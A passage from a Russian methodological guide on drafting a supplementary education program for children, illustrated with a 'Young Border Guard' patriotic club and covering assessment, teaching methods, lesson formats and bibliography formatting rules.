  Итогом  третьего года обучения является сдача нормативов и стрельба из пневматического оружия.

Подготовка походов включает изучение и разработку маршрута, распределение обязанностей, организационную и хозяйственную подготовку. Маршруты походов  построены таким образом, что обучающиеся познакомятся с местами революционной, боевой, трудовой славы края, с наиболее типичными формами рельефа, с местной флорой и фауной. В результате походов ребята приобретают знания по охране природы, о памятниках истории и культуры.

Прямыми критериями оценки результатов обучения служит успешное усвоение программы, прирост спортивных достижений, участие в походах, соревнованиях, краеведческих конференциях и исторических викторинах при наличии положительных результатов.

Косвенными критериями служат: создание стабильного коллектива объединения, заинтересованность участников в выбранном виде деятельности, развитие чувства ответственности и товарищества, а в конечном итоге – воспитание физически здоровых, сознательных патриотов своей Родины.

  В процессе обучения предусматриваются аттестации, теоретические зачёты, тестовые проверки и зачётные соревнования. Осваивая разделы программы, ребёнок сможет осознанно выбрать подходящую специализацию и, используя широкий комплекс полученных знаний и навыков, продолжить своё развитие в одном из специализированных объединений.

 

- Формы предъявления и демонстрации образовательных результатов: аналитический материал по итогам проведения психологической диагностики, аналитическая справка, выставка, готовое изделие, демонстрация моделей, диагностическая карта, защита творческих работ, конкурс, контрольная работа, концерт, научно-практическая конференция, олимпиада, открытое занятие, отчет итоговый, портфолио, поступление выпускников в профессиональные образовательные организации по профилю, праздник, слет, соревнование, фестиваль и др.

Например, по итогам проведения диагностики, куда входят: теоретическая подготовка, практическая подготовка- умения и навыки, предусмотренные программой, умение осуществлять учебно-исследовательскую работу, навыки соблюдения в процессе деятельности правил безопасности, а также участие в соревнованиях и походах, их результативность. Результаты фиксируются в аналитическую справку, а итоги соревнований размещаются на сайт образовательной организации.  Проводится итоговый слёт в котором участие принимают и родители обучающихся. 

2.4 Оценочные материалы

В данном разделе отражается перечень (пакет) диагностических методик, позволяющих определить достижение учащимися планируемых результатов (Закон № 273-ФЗ, ст. 2, п. 9; ст. 47, п.5)

Например, при реализации программы «Юный пограничник» используется несколько видов контроля:

 входной – по трем показателям (низкий, средний, высокий уровни). Собеседование, анкетирование, тестирование в начале года для определения уровня физического развития обучающихся;

 текущий – проходит после изучения каждого раздела программы (тестирование, зачет, соревнования, проверочное занятие). Помогает педагогу проверить усвоение данного материала и выявить обучающихся, которым нужна помощь педагога.

 итоговый – в конце учебного года определение индивидуального уровня обучающегося (совершение похода).

Уровень оценки результатов: низкий, средний, высокий.

2.5 Методические материалы

Настоящий раздел представляет краткое описание методики работы по программе и включает в себя:

особенности организации образовательного процесса – очно, очно-заочно, заочно, дистанционно, в условиях сетевого взаимодействия и др.;

Например, программой «Юный пограничник» предусмотрены как теоретические, так и практические формы занятий, однако, преимущественно занятия носят практическую направленность, а теоретическая часть носит характер сообщения или инструктажа. 

Занятия с объемным теоретическим материалом в зависимости от содержания проводятся или в специально оборудованном кабинете, оснащенном наглядными учебно-методическими материалами (плакаты по туристическому снаряжению, схемы, видеоролики, необходимое туристическое оборудование), или на базе участковой больницы, или в компьютерном классе, а затем практическая часть - в спортивном зале или рядом расположенном лесном массиве. Все занятия, проводимые в спортивном зале или на свежем воздухе, начинаются с обязательной 15-минутной общефизической разминки, которая иногда проводится в форме подвижных или спортивных игр.    

 Значительное место в программе отведено исследовательской и творческой работе учащихся: составление и защита проектов экологической и краеведческой направленности, запись воспоминаний старожилов села и района, составление летописей, альбомов, буклетов, физической подготовке, НВП, огневая подготовка презентация фотовыставок и видеофильмов и т.п.

Активно используются традиционные формы занятий: соревнования, походы, путешествия, экскурсии, экспедиции, лекции, беседы, практические занятия. 

Широко применяются игровые методы обучения: деловые, ролевые, спортивные игры, викторины, конкурсы, соревнования; проблемно-поисковые и эвристические методы, проектные технологии (например, очистка и благоустройство родников и др.), групповые тренинги (например, тренинги командообразования).

Основной формой организации деятельности, согласно программе, является групповая, однако, применяется и индивидуальный подход.

методы обучения (словесный, наглядный практический; объяснительно-иллюстративный, репродуктивный, частично- поисковый, исследовательский проблемный; игровой, дискуссионный, проектный и др.) и воспитания (убеждение, поощрение, упражнение, стимулирование, мотивация и др.);

Например, 1.Тестирование - исследовательский метод позволяет выявить степень соответствия планируемых и реально достигнутых результатов воспитания и социализации обучающихся путем анализа результатов и способов выполнения ими ряда специально разработанных заданий.

2.Опрос-получение информации, заключенной в словесных сообщений обучающихся. Для оценки эффективности деятельности обучающихся используются следующие виды опроса:

- анкетирование- метод получения информации на основании ответов обучающихся на специально подготовленные вопросы анкеты.

-беседа-диалог педагога и обучающихся по заранее составленному плану. Это наиболее эффективный метод для выявления мотивов поведения, ценностных ориентаций, чувств, переживаний.

3.Наблюдение-организованное целенаправленное восприятие и фиксация особенностей, закономерностей развития и воспитания обучающихся.

 

формы организации образовательного процесса: индивидуальная, индивидуально-групповая и групповая; выбор той или иной формы обосновывается с позиции профиля деятельности (музыкального, спортивного, художественного и др.), категории обучающихся (дети-инвалиды, дети с ОВЗ) и др.;

Например, 1.По направленности обучения: теоретические и практические;

2.По месту проведения: аудиторные и внеаудиторные;

3.По организации обучающихся:

       -индивидуальные-взаимодействие педагога с одним учеником, что позволяет учитывать индивидуальные особенности обучающихся.   

       -коллективные –работа педагога со всеми обучающимися;

       -групповые-работа с группой, которая может создаваться: по уровню подготовки детей, учету их интересов и потребностей.

      - фронтальная-работа педагога сразу со всеми обучающимися едином темпе и с общими задачами.

  Занятия проводятся как с полным составом группы, где уделяется особое внимание  индивидуальным особенностям обучающихся.

Занятия по программе комбинированные, включающие, как теорию, так и практику.Основная форма проведения практических занятий - занятия на местности или в спортивном зале. Задачи и содержание занятий определяются в зависимости от периода года, целей занятии, состава занимающихся и условий проведения занятия. Принципиальное изменение форм организации урока заключается в том, что занятие из класса, по возможности, переносится в ту среду, которая изучается (парк, лес, водоем, пришкольный участок, музей, улица, дом, учреждения, предприятия и т. д.).      

формы организации учебного занятия - акция, аукцион, бенефис, беседа, вернисаж, встреча с интересными людьми, выставка, галерея, гостиная, диспут, защита проектов, игра, концерт, КВН, конкурс, конференция, круглый стол, круиз, лабораторное занятие, лекция, мастер-класс, «мозговой штурм», наблюдение, олимпиада, открытое занятие, посиделки, поход, праздник, практическое занятие, представление, презентация, рейд, ринг, салон, семинар, соревнование, спектакль, студия, творческая мастерская, тренинг, турнир, фабрика, фестиваль, чемпионат, шоу, экскурсия, экзамен, экспедиция, эксперимент, эстафета, ярмарка;

Семинар-учебное занятие в форме коллективного обсуждения изучаемых вопросов докладов, рефератов.

Зачет-форма организации обучения по выявлению и контролю знаний обучающихся.

Экскурсия- форма организации обучения, которая позволяет изучать объекты, предметы, явления, процессы в естественных условиях.

Защита проекта- форма организации обучения обоснования принятых в проекте решений – и проекта в целом, направляемого на тему изучения. 

Поход- групповое организованное мероприятие, проверка приобретенных теоретических знаний для переноса их на практику.

Соревнование- форма организации обучения позволяет выявить лидеров группы и приобретенные навыки, противоборство и конкурентная борьба между несколькими сторонами за достижение превосходства.

Эксперимент-форма познания объективной действительности в науке, при котором явления изучают при помощи целесообразно выбранных или искусственно созданных контролируемых условий.

алгоритм учебного занятия – краткое описание структуры занятия и его этапов; Прописывается каждый из этапов занятия.

дидактические материалы – раздаточные материалы, инструкционные, технологические карты, задания, упражнения, образцы изделий и т.п. -наглядные пособия: книги, схемы, плакаты, фотографии, видеофильмы;

     - технические средства: компьютер.

     - тренировки, полигоны, со­ревнования, походы, зачетные занятия, соревнования, походы, учебно- тренировочные сборы (практические).

 

2.6 Список литературы

При составлении списка литературы необходимо учитывать:

− основную и дополнительную учебную литературу: учебные пособия, сборники упражнений, контрольных заданий, тестов, практических работ и практикумов, хрестоматии;

− наглядный материал: альбомы, атласы, карты, таблицы.

Список может быть составлен для разных участников образовательного процесса (педагогов, детей, родителей). Список оформляется в соответствии с ГОСТ к оформлению

библиографических ссылок.

И,  наконец, последняя часть (блок) программы представляет собой список литературы. Список должен быть достаточно объемным. В него должна включаться как литература, используемая педагогом для подготовки занятий, так и научная литература, расширяющая кругозор самого педагога. Может быть составлен отдельный список литературы для детей и родителей по тематике занятий (для расширения диапазона образовательного воздействия и помощи родителям в обучении и воспитании ребенка).

Переходя к составлению списка научной литературы, вы должны продемонстрировать достаточно глубокое знакомство с имеющимися источниками, способность к критическому мышлению и объективной оценке сделанного вашими предшественниками в освоении этой темы. Сюда включается литература по: 1) общей педагогике,  2) методике данного вида деятельности и воспитания, 3) дидактике, 4) общей и возрастной психологии, 5) теории и истории выбранного вида деятельности, 6) опубликованные учебные пособия, 7) перечень видео- и аудиозаписей и др. Задача этого раздела состоит в том, чтобы показать уровень и широту своей теоретической подготовленности.

Требования к оформлению списка литературы

Если в материалах необходимо привести список литературы, то он выполняется в соответствии с требованиями ГОСТа. Заключаются они в следующем.

Все источники литературы размещаются в строго алфавитном порядке от 1 до последнего. Цифры располагаются двумя способами: 1) как абзац в тексте; 2) выносятся за текст слева.

Описывая книгу, следует указать: фамилию автора, затем инициалы (если имеются); полное название книги (без кавычек!) с подзаголовками, которые могут идти после запятой, через точку, после двоеточия, в скобках и т. п. После косой черты («/») — указывается, под чьей редакцией вышла книга (/Под ред.П. П. Волкова, К. Д. Соловьевой и др.), а также переводчик (/Пер. А. Левиной). Следует обращать внимание на размещение инициалов! В начале строки сначала идет фамилия автора, затем инициалы; при указании лица, под чьей редакцией вышла работа, — сначала инициалы, затем фамилия.

Если приводится статья из книги, то ставятся «//», после которых без кавычек указывается название книги; собрание сочинений и др. (Собр. соч.; Собр. пед. соч.; Поли. собр. соч.; Сб. — сборник); затем ставится двоеточие и количество томов («: В 5-ти т.»).

После каждой группы данных ставится точка и тире («. — »). Том, часть, страница — указываются заглавной буквой с точкой: «Т.», «Ч.», «С.» (когда в тексте приведена цитата); выпуск — «Вып. 1».

Приняты к сокращению ученые звания: доктор — «д-р»; кандидат педагогических наук — «к. п. н.» (допускается «канд. пед. наук»; кандидат психологических наук — «к. психол. н.»; философских — «к. философ, н.»; филологических — «к. фи-лол. н.»; профессор — «проф.» и другие. Сокращаются только названия городов: Москва — М.; Ленинград — Л.; Санкт-Петербург — С.-Пб. (или СПб.); София — С. (Болгария). Может встречаться сокращение: Киев — К. Слова типа «учебное пособие», «сборник» и т. п. пишутся сокращенно только в том случае, если такое сокращение принято. Другие сокращения не допускаются и слова пишутся полностью. Принятые сокращения можно найти в начале любого энциклопедического словаря.

Затем указывается город, где издана книга; издательство; цифра года издания (слово «год» не пишется). Например: «. — М.: Педагогика, 1985». Допускается опускать издательство, тогда указывается город и год: «. — М., 1985».

При повторении источника (книги) дважды подряд может указываться: «Там же. — с. 37».

  

4. Модель реализации программы

1. Содержание образования.

В патриотическом воспитании значительная часть самого его содержания – исторические, культурные, личностные проблемы.

Чему будем учить и какие качества личности воспитывать.

Мы будем формировать патриотическое сознание и гражданское поведение;

 развивать нравственные качества, такие, как гуманизм, совесть, честь, достоинство, долг, принципиальность, ответственность, товарищество, коллективизм, доброта, стыд, уважение к людям, милосердие через создание проблемных ситуаций, социально-значимую деятельность, акции и проекты.

Будем формировать опыт социального поведения, соответствующего принятым этическим нормам и традициям; нравственные привычки, нравственное сознание, основными категориями которого является нравственный идеал, этические ценности и нормы, моральная мотивация, этические оценки

 5. Модель «Гражданина и патриот

 - это человек, который:

  • освоил образовательную программу;
  • умеет быстро адаптироваться к меняющимся социально-экономическим отношениям;
  • законопослушен, обладает основами правового образования, знает свои гражданские права и умеет их реализовать;
  • владеет культурой жизненного самоопределения и самореализации;
  • владеет навыками культуры общения, коммуникабелен, умеет корректировать своё поведение и чужую агрессию, психологически устойчив;
  • уважает своё и чужое достоинство, собственный труд и труд других людей
  • обладает чувством социальной ответственности;
  • развивает свой творческий потенциал, ведёт здоровый образ жизни.
  • является сознательным гражданином России, которому дороги понятия «Родина», «гуманизм», «культура», «любовь», «семья»;

  Все мероприятия программы ориентированы на все социальные слои и возрастные группы граждан, определяют основные пути развития системы патриотического воспитания, ее основные компоненты, позволяющие формировать готовность молодежи к служению Отечеству. При этом учитывается опыт и достижения прошлого, современные реалии и проблемы, тенденции развития современного общества.

              Реализация деятельности по данному направлению способствует сохранению общественной стабильности, формированию патриотического сознания у подрастающего поколения, повышению воспитательного воздействия российской культуры, искусства и образования как важнейших факторов формирования патриот.

 

comback_black_green_75


Обновлено 31.10.2017 15:31